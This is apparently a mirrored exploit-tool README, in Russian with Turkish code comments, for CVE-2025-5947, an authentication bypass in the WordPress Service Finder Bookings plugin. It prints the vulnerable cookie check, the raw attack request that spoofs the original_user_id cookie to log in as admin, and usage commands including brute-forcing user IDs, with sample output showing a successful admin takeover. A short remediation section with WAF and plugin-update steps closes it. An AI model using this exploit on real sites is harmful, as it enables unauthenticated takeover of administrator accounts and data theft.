## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XXCONI-CVE-2025-5947
# CVE-2025-5947
Эксплойт CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0
# CVE-2025-5947 Exploit - Service Finder Bookings
   
> Инструмент эксплуатации уязвимости обхода аутентификации в плагине WordPress Service Finder Bookings ≤ 6.0
## 📋 Содержание
* Об уязвимости
* Технические детали
* Установка
* Использование
* Примеры
* Результаты
* Безопасность
* Ресурсы
## 🔴 Об уязвимости
### CVE-2025-5947
В плагине **Service Finder Bookings** для WordPress версии 6.0 и ранее обнаружена критическая уязвимость обхода аутентификации.
### 🎯 Воздействие
Неаутентифицированные злоумышленники могут:
* ✅ Войти под видом любого пользователя
* ✅ Получить доступ к учётным записям администраторов
* ✅ Получить полный контроль над системой
* ✅ Вызвать утечку данных
* ✅ Загрузить вредоносный код
## 🔍 Технические детали
### Причина уязвимости
В функции `service_finder_switch_back()` наблюдается **недостаточная проверка cookie** :
root@kitploit:~
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
$user_id = $_COOKIE['original_user_id'];
wp_set_current_user($user_id);
// Doğrulama yok!
}
### Вектор атаки
root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
**Характеристики атаки:**
* 🌐 Удалённый доступ (AV:N)
* 🔓 Без аутентификации (PR:N)
* 👤 Без взаимодействия с пользователем (UI:N)
* 📊 Полное воздействие (C:H, I:H, A:H)
## 📦 Установка
### Требования
* Python 3.6+
* библиотека requests
### Шаг 1: Клонируйте репозиторий
root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
### Шаг 2: Установите зависимости
root@kitploit:~
pip install -r requirements.txt
### Шаг 3: Запустите
root@kitploit:~
python exploit.py -u http://target.com
## 🚀 Использование
### Основные команды
root@kitploit:~
# Yardım göster
python exploit.py -h
# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com
# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5
# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10
# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify
# Özel timeout ile
python exploit.py -u http://target.com -t 30
### Параметры
## 💡 Примеры
### Пример 1: Простой эксплойт
root@kitploit:~
python exploit.py -u http://wordpress.local
**Вывод:**
root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu
🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
Location: http://wordpress.local/wp-admin/
Set-Cookie: wordpress_logged_in_abc123=...
✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/
### Пример 2: Перебор (Brute Force)
root@kitploit:~
python exploit.py -u http://target.com -b 1-20
**Вывод:**
root@kitploit:~
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]
### Пример 3: HTTPS без проверки SSL
root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify
## 📊 Результаты
Успешный эксплойт характеризуется следующими признаками:
✅ Код ответа HTTP 301 или 302
✅ Наличие `/wp-admin/` в заголовке `Location`
✅ Наличие `wordpress_logged_in_` в заголовке `Set-Cookie`
## 🛡️ Безопасность
### ⚠️ Правовое предупреждение
**Этот инструмент предназначен исключительно для:**
* ✅ Авторизованного тестирования безопасности
* ✅ Использования на ваших собственных системах
* ✅ Использования при наличии письменного разрешения
**Используйте только в этих целях. Автор не несёт ответственности.**
### 🔐 Способы защиты
1. **Срочное обновление**
root@kitploit:~
# WordPress admin panelinden güncelle
# veya WP-CLI ile
wp plugin update sf-booking
2. **Отключение плагина**
root@kitploit:~
wp plugin deactivate sf-booking
3. **Удаление плагина**
root@kitploit:~
wp plugin delete sf-booking
4. **Web Application Firewall (WAF)**
root@kitploit:~
Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
5. **Проверка безопасности**
* Проверьте учётные записи администраторов
* Изучите журналы доступа
* Проверьте, не было ли несанкционированного доступа
## 📚 Ресурсы
* База данных Patchstack
* GitHub Advisory
* Детали NVD
* Оригинальный эксплойт
* Калькулятор CVSS
## 🤝 Внесение вклада
Чтобы сообщить об ошибках или предложить улучшения:
1. Сделайте форк
2. Создайте отдельную ветку (`git checkout -b feature/improvement`)
3. Сделайте коммит (`git commit -am 'Add improvement'`)
4. Запушьте изменения (`git push origin feature/improvement`)
5. Откройте Pull Request
## 📄 Лицензия
Лицензия MIT — подробности см. в файле LICENSE
## 👤 Автор
**Исследователь безопасности**
* GitHub: @yourusername
## 🙏 Благодарности
* Patchstack Security Team
* WordPress Security Community
* CVE Coordinators
* * *
⭐ Если вам пригодилось, поставьте звезду!
🔝 Наверх